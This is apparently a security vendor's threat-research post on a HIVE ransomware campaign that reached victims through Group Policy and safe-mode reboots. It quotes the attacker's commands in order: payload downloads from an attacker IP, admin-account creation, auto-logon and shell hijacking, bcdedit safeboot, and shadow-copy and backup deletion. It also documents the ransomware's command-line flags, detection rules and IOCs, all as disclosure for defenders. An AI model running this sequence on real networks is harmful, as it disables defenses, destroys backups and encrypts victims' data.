### How malicious actors evade detection and disable defenses for more destructive HIVE Ransomware attacks.
Rapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious activity. One objective of this research is to discover new techniques being used in the wild, so we can develop new detection and response capabilities.
Recently, Rapid7 observed a malicious actor performing several known techniques for distributing ransomware across many systems within a victimâs environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to to drop the defenses of the victim, inhibit monitoring, disable networking and allow time for the ransomware to finish encrypting files. These extra steps would make it extremely difficult, if not impossible, for a victim to effectively use their security tools to defend endpoints after a certain point in the attack.
Rapid7 has updated existing and added new detections to InsightIDR to defend against these techniques. In this article, weâll explore the techniques employed by the threat actor, why theyâre so effective, and how weâve updated InsightIDR to protect against them.
### What approach did the malicious actor take to prepare the victim’s environment?
Initially using [Cobalt Strike](), the malicious actor retrieved system administration tools and malicious payloads by using the Background Intelligent Transfer Service ([BITSAdmin]()).
“C:Windowssystem32bitsadmin.exe” /transfer debjob /download /priority normal https://79.137.206.47/PsExec.exe C:UsersPublicPsExec.exe
bitsadmin /transfer debjob /download /priority normal https://79.137.206.47/int.exe C:Windowsint.exe
The malicious actor then began using the remote process execution tool [PSExec]() to execute batch files (`rdp.bat`) that would cause registry changes to [enable Remote Desktop]() sessions (RDP) using `reg.exe`. This enabled the malicious actor to laterally move throughout the victimâs environment using the graphical user interface.
PSEXESVC.exe: C:WindowsPSEXESVC.exeâââcmd.exe: C:Windowssystem32cmd.exe /c “”rdp.bat” “âââ reg.exe: reg add “HKLMSystemCurrentControlSetControlTerminal Server” /v “fDenyTSConnections” /t REG_DWORD /d 0 /f
Rapid7 observed the malicious actor add/change policies for the Active Directory domain to perform the following:
1. Copy down batch scripts
2. Execute batch scripts (`file1.bat`), which:
3. Creates administrator account on the local system
4. Reconfigures [boot configuration data]() (`bcdedit.exe`) so that the host will not load any additional drivers or services (ie: network drivers or endpoint protection)
5. Sets various registry values to ensure the created local administrator user will automatically logon by default
6. Changes the [Windows Shell]() from Explorer to their malicious script (`file2.bat`)
7. Reboots the system with the shutdown command
8. On reboot, the system logs in and executes the shell (`file2.bat`), which:
9. Extracts HIVE ransomware payload(s) from an encrypted archive (`int.7z`) using 7-Zip’s console executable (`7zr.exe`)
10. Executes the ransomware payload (`int.exe or int64.exe`)
Below are some commands observed executed by the malicious actor (with necessary redactions):
xcopy.exe /C/Q/H/Y/Z
“\sysvol\Policies {}MachineScriptsStartupfile1.bat” “C:windows”
xcopy.exe /C/Q/H/Y/Z
“\sysvol\Policies{}MachineScriptsStartupfile2.bat” “C:windows”
xcopy.exe /C/Q/H/Y/Z
“\sysvol\Policies{}MachineScriptsStartup7zr.exe” “C:windows”
xcopy.exe /C/Q/H/Y/Z
“\sysvol\Policies{}MachineScriptsStartupint.7z” “C:windows”
C:WINDOWSSYSTEM32cmd.exe /c “C:windowsfile1.bat”
net user /add
C:WINDOWSsystem32net1 user /add
net user /active:yes
C:WINDOWSsystem32net1 user /active:yes
net localgroup Administrators /add
C:WINDOWSsystem32net1 localgroup Administrators /add
bcdedit /set {default} safeboot minimal
reg add “HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon” /v LegalNoticeText /t REG_SZ /d “” /f
reg add “HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon” /v LegalNoticeCaption /t REG_SZ /d “” /f
reg add “HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem” /v LegalNoticeText /t REG_SZ /d “” /f
reg add “HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem” /v LegalNoticeCaption /t REG_SZ /d “” /f
reg add “HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon” /v AutoAdminLogon /t REG_SZ /d 1 /f
reg add “HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon” /v DefaultUserName /t REG_SZ /d /f
reg add “HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon” /v DefaultPassword /t REG_SZ /d /f
reg add “HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon” /v AutoLogonCount /t REG_DWORD /d 1 /f
reg add “HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon” /v Shell /t REG_SZ /d “C:windowsfile2.bat” /f
shutdown -r -f -t 10 -c “Computer Will Now Restart In SAFE MODE…”
Rapid7 also observed the malicious actor extracting HIVE ransomware payload using 7zip’s console application (`7zr.exe`) from encrypted 7zip archive (`int.7z`) with a simple password (`123`):
`”C:windows7zr.exe” x c:windowsint.7z -p123 -oc:windows`
The malicious actor then manually executed the ransomware (`int.exe`) once with only the required username:password combination passed to the `-u` flag. This presumably encrypted the local drive and also all network shares the user had access to:
`”C:Windowsint.exe” -u :”`
The malicious actor also manually executed the 64 bit version of the ransomware (`int64.exe`) once on a different host with the `-no-discovery flag`. This is likely intended to override the default behavior and not discover network shares to encrypt their files. The `-u` flag was also passed and the same values for the username:password were provided as seen on the other host.
`C:Windowsint64.exe -u : -no-discovery`
### Why is this approach so effective?
Deployment of ransomware using Active Directory group policies allows the malicious actor to hit all systems in the environment for as long as that group policy is active in the victimâs environment. In this case, any system that was booting and connected to the environment would receive the configuration changes, encrypted archive containing the ransomware, a decompression utility to extract the ransomware, configuration changes and the order to reboot and execute. This can be especially effective if timed with deployments of patches that require a reboot, done at the beginning of the day or even remotely using [Powershell’s Stop-Computer cmdlet]().
Storing the ransomware within a 7zip encrypted archive (`int.7z`) with a password even as simple as (`123`) makes the task of identifying the ransomware on disk or transmitted across the network nearly impossible. This makes retrieval and staging of the malicious actors payload very difficult to spot by security software or devices (Antivirus, Web Filtering, IDS/IPS and more). In this case, the malicious actor has taken care to only put the encrypted copy on the disk of a victimâs system and not execute it until they have fully dropped the defenses on the endpoint.
Reconfiguring the default boot behavior to safeboot minimal and then executing a reboot unloads all but the bare minimum for the Windows operating system. With no additional services, software or drivers loaded the system is at its most vulnerable. With no active defenses (Antivirus or Endpoint Protection) the system comes up and tries to start its defined shell which has been swapped to a batch script (`file2.bat`) by the malicious actor.
It should be noted that in this state, **there is no method of remotely interacting with the system as no network drivers are loaded. In order to respond and halt the ransomware, each host must be physically visited for shutdown. **Manually priming the host in this way is more effective than the existing capabilities of the HIVE ransomware which stops specific defensive services (Windows Defender, etc) and kills specific processes prior to encrypting the contents of the drive.
All systems in this state are left automatically logged in as an administrator, which gives anyone who has physical access complete control. Lastly, the system will continue to boot into safeboot minimal mode by default (again, no networking) until each system is set back to its original state with a command such as below. Bringing the host back online in this state will still continue to execute the malware when logged into, which will also enable the default network spreading behavior.
`bcdedit /deletevalue {default} safeboot`
Lastly, the malicious actor also manually executed the payload a few times on systems that had not been put into `safeboot minimal` and rebooted. Systems they executed with only the `-u` flag actively searched out network shares they had access to and encrypted their contents. This ensures that only the intended hosts do network share encryption and all those that were rebooted into safeboot minimal do not flood the network simultaneously encrypting all files. It also means that the contents of network file shares that are not Windows based (various NAS devices, Linux hosts using Samba) will be encrypted even if the payload is not actually deployed on that specific host. This approach would be extremely destructive to both corporate environments and home users with network attached storage systems for backups. Rapid7 notes that [ThreatLocker]() have reported on similar activity in their knowledge base article entitled [Preventing BCDEdit From Being Weaponized]().
### Malware analysis of HIVE sample
Rapid7 observed that the HIVE payload would not execute unless a flag of -u was passed. During analysis it was discovered that passing -u asdf:asdf would result in the Login and Password (colon-delimited) provided to the victim to authenticate to the site behind the onion link on the TOR network:
This, and other behaviors were previously reported on by Microsoft’s article [Hive Ransomware Gets Upgrades in Rust]() and also by Sophos in their [Github Repository of IoC’s]() mentioned in their article [Lockbit, Hive, and BlackCat attack automotive supplier in triple ransomware attack](). There have been some flags that are noted to exist, but their features are not documented. Rapid7 has analyzed the behaviors of these flags, documented them in addition to discovering two new flags (`-timer, -low-key`) in the HIVE ransomware samples.
The new flags `-t, -timer, –timer` effectively cause the malware to wait the specified number of seconds before going on to perform its actions. The other new flags `-low-key, –low-key` will cause the ransomware to focus on only its encryption of data and not perform pre-encryption tasks, including deleting shadow copies (malicious use of `vssadmin.exe, wmic.exe`), deleting backup catalogs (malicious use of `wbadmin.exe`), and disabling Windows Recovery Mode (malicious use of `bcdedit.exe`). These features give the malicious actor more control over how/when the payload is executed and skirt common methods of command line and parent/child process related detection for most ransomware families.
Fundamentally, the sampleâs respective flags distill down into encryption operations of `local`, `mount` and `discovery`. The local module utilizes the [LookupPrivilegeValueW]() and [AdjustTokenPrivileges]() that Windows API calls on its own process via [GetCurrentProcess]() and [OpenProcessToken]() to obtain SeDebugPrivilege privileges. This is presumably crucial for [OpenProcess]() -> [OpenProcessToken]() -> [ImpersonateLoggedOnUser]() API call attempts to processes: `winlogon.exe` and `trustedinstaller.exe` to subsequently stop security services and essential processes, if the `–low-key` is not passed during execution. [ShellExecuteA]() is also used to launch various Windows binaries (`bcdedit.exe`, `notepad.exe`, `vssadmin.exe`, `wbadmin.exe`, `wmic.exe`) for destruction of backups and ransom note display purposes. The mount module will use [NetUseEnum]() to identify the current list of locally-mounted network shares and add them to the list to be encrypted. Lastly, the discovery module will use [NetServerEnum]() to identify available Windows hosts within the domain/workgroup. This list is then used with [NetShareEnum]() to identify file shares on each remote host and add them to the list of locations to have their files encrypted.
By default, all three modes (`local`, `mount` and `discovery`)are enabled, so all local, mounted and shares able to be enumerated will have their contents encrypted. This effectively ransoms all systems in a victimâs environment with a single execution of HIVEâwhen performed by a privileged user such as a Domain or Enterprise Admin account. Command line flags may be used to change this behavior and invoke one or more of the modules. For instanceâlocal-only will use only the local module whileânetwork-only will use the mount and discovery modules.
Flag
|
Description
—|—
-u
|
<username>:<password> for login for hivecust*.onion domain to identify victim
-da
|
<domainname><username>:<password> use different credentials when doing network spreading. Likely shorthand for “Domain Admin”. Calls [LogonUserW]() triggering an [4624(S): Type 3 Network Logon]() event. Will then call [ImpersonateLoggedOnUser]() using the token in the response from LogonUserW.
-low-key
–low-key
|
Encrypt files and open ransom note, if local filesystem is to be encrypted, but do not spawn other binaries (vssadmin.exe, WMIC.exe, wbadmin.exe, bcdedit.exe) to perform other destructive actions for impact. Will also skip enumeration and stopping of antivirus software.
-no-local
–no-local
|
Do not encrypt local files
-no-mounted
–no-mounted
|
Do not encrypted mounted filesystems
-no-discovery
–no-discovery
|
Do not enumerate or encrypt file shares on the network
-local-only
–local-only
|
Only encrypt local file systems
-network-only
–network-only
|
Only encrypt file shares on the network.
-explicit-only
–explicit-only
|
Only encrypt files in this specific path specified
-min-size
–min-size
|
Only encrypt files greater than or equal to a specific number of bytes
-t
-timer
–timer
|
Do not encrypt files until after specified number of seconds
By default, the ransomware will execute the following child processes with the following arguments:
Use of `vssadmin.exe` in order to delete shadow copies of files which deletes unencrypted backups of files they are attempting to ransom:
`”C:WindowsSystem32vssadmin.exe” delete shadows /all /quiet`
Use of `wmic.exe` to create calls that also delete all shadow copies of files which deletes unencrypted backups of files they are attempting to ransom:
`”C:WindowsSystem32wbemWMIC.exe” shadowcopy delete`
Use of `wbadmin.exe` to delete backup catalogs:
`”C:WindowsSystem32wbadmin.exe” delete systemstatebackup`
`”C:WindowsSystem32wbadmin.exe” delete catalog-quiet`
`”C:WindowsSystem32wbadmin.exe” delete systemstatebackup -keepVersions:3`
Use of `bcdedit.exe` to disable automatic repair and ignore errors when booting:
`”C:WindowsSystem32bcdedit.exe” /set {default} recoveryenabled No`
`”C:WindowsSystem32bcdedit.exe” /set {default} bootstatuspolicy ignoreallfailures`
Lastly, also opening up `notepad.exe` to display the ransom note with instructions to the victim on how to pay:
`”C:WindowsSystem32notepad.exe” C:HOW_TO_DECRYPT.txt`
## Rapid7 Protection
Rapid7 has detections in place within InsightIDR through Insight Agent to detect this type of ransomware activity. However, since the malicious actor is rebooting into `safemode minimal` state, endpoint protection software and networking will not be running while the endpoint is executing ransomware.
So, identifying the actions of a malicious actor **before** ransomware is deployed is crucial to preventing the attack. In other words, it is essential to identify malicious actors within the environment and eject them before the ransomware payload is dropped.
The following detections are now available InsightIDR to identify this attacker behavior.
* Attacker Technique – Auto Logon Count Set Once
* Attacker Technique – Potential Process Hollowing To DLLHost
* Attacker Technique – Shutdown With Message Used By Malicious Actors
* Attacker Technique – URL Passed To BitsAdmin
* Lateral Movement – Enable RDP via reg.exe
* Suspicious Process – BCDEdit Enabling Safeboot
* Suspicious Process – Boot Configuration Data Editor Activity
* Suspicious Process – DLLHost With No Arguments Spawns Process
* Suspicious Process – Rundll32.exe With No Arguments Spawns Process
* Suspicious Process – ShadowCopy Delete Passed To WMIC
* Suspicious Process – Volume Shadow Service Delete Shadow Copies
**IOC’s**
Type
|
Value
—|—
Registry Key
|
HKLMSystemCurrentControlSetControlTerminal Server
Registry Value
|
Type: DWORD Name: fDenyTSConnections Value: 0
Filename
|
rdp.bat
Filename
|
file1.bat
Filename
|
file2.bat
Filename
|
int.7z
Filename
|
int64.exe
MD5
|
89ea20880a6aae021940a8166ff85ee8
SHA1
|
4af769fb3109c754bc879201c61242217a674a2e
SHA256
|
067af912ceddb1ea181490f2b3b5a323efcac61c82207833cda70c21c84460cb
Filename
|
int.exe
MD5
|
8fba0d57696ccf672ddcea4ba4d0e885
SHA1
|
31097a7f91d182755fc63ebf023bff54cda5ae9c
SHA256
|
184a0f96cef09408b192767b405b0266403c9ec429945c1a78703f04f18c7416
IP Address
|
79.137.206[.]47
FQDN
|
paloaltocloud[.]online
FQDN
|
maxkey[.]online
FQDN
|
keycloud[.]live
FQDN
|
microcloud[.]online
FQDN
|
microcloud[.]live
IP Address
|
194.135.24[.]241
IP Address
|
179.43.142[.]230
IP Address
|
77.73.133[.]80
IP Address
|
77.73.134[.]27
IP Address
|
77.73.134[.]10
**MITRE ATT&CK**
**Techniques**
[T1021 – Remote Services]()
[T1021.001 – Remote Desktop Protocol]()
[T1021.002 – SMB/Windows Admin Shares]()
[T1027 – Obfuscated Files Or Information]()
[T1027.009 – Embedded Payloads]()
[T1037 – Boot Or Logon Initialization Scripts]()
[T1037.003 – Network Logon Script]()
[T1059 – Command And Scripting Interpreter]()
[T1059.001 – PowerShell]()
[T1059.003 – Windows Command Shell]()
[T1070 – Indicator Removal]()
[T1080 – Taint Shared Content]()
[T1105 – Ingress Tool Transfer]()
[T1112 – Modify Registry]()
[T1135 – Network Share Discovery]()
[T1136 – Create Account]()
[T1136.001 – Local Account]()
[T1140 – Deobfuscate/Decode Files Or Information]()
[T1197 – BITS Jobs]()
[T1480 – Execution Guardrails]()
[T1484 – Domain Policy Modification]()
[T1484.001 – Group Policy Modification]()
[T1485 – Data Destruction]()
[T1486 – Data Encrypted For Impact]()
[T1489 – Service Stop]()
[T1490 – Inhibit System Recovery]()
[T1529 – System Shutdown/Reboot]()
[T1547 – Boot Or Logon Autostart Execution]()
[T1560 – Archive Collected Data]()
[T1560.001 – Archive Via Utility]()
[T1562 – Impair Defenses]()
[T1562.001 – Disable Or Modify Tools]()
[T1562.009 – Safe Mode Boot]()
[T1570 – Lateral Tool Transfer]()
**Software**
[S0029 – PSExec]()
[S0075 – Reg]()
[S0190 – BITSAdmin]()
[S0154 – Cobalt Strike]()Read More